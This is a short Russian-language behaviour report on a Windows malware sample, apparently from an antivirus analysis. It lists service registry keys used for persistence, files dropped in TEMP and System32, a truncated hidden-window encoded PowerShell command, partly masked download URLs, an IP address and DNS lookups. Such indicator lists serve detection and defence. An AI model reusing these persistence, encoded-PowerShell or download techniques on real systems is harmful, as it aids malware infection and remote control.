Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\puiapi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\puiapi] 'ImagePath' = '"<SYSTEM32>\eappprxy\puiapi.exe"'
- 'puiapi' "<SYSTEM32>\eappprxy\puiapi.exe"
- 'puiapi' <SYSTEM32>\eappprxy\puiapi.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHMAOQBrAHcAdgBoAD0AJwBYAGUANQB5ADkAdABqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAGMAVQByAGkAdAB5AHAAcgBPAGAAVABPAEMAYABPAEwAIgAgAD0AIAAnAH...
- %TEMP%\wxnd.exe
- <SYSTEM32>\eappprxy\puiapi.exe
- %TEMP%\wxnd.exe в <SYSTEM32>\eappprxy\puiapi.exe
- '75.##9.38.211':80
- http://co#######ion.maitriinfosoft.com/9efesfwep/en99_b_96ukm/
- http://to##o.net/fmc66/g3h_xw_epkgkl0y/
- http://75.##9.38.211/H8RgAr/Ew53Lgc4wW0pxCdGsN/KrPOUHbslJ4H3FR8S/3a4dup43JMeuGsUPKG6/SrNJKI22c1fZJQMp4/
- DNS ASK co#######ion.maitriinfosoft.com
- DNS ASK to##o.net
- '%TEMP%\wxnd.exe'
- '<SYSTEM32>\eappprxy\puiapi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHMAOQBrAHcAdgBoAD0AJwBYAGUANQB5ADkAdABqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAGMAVQByAGkAdAB5AHAAcgBPAGAAVABPAEMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)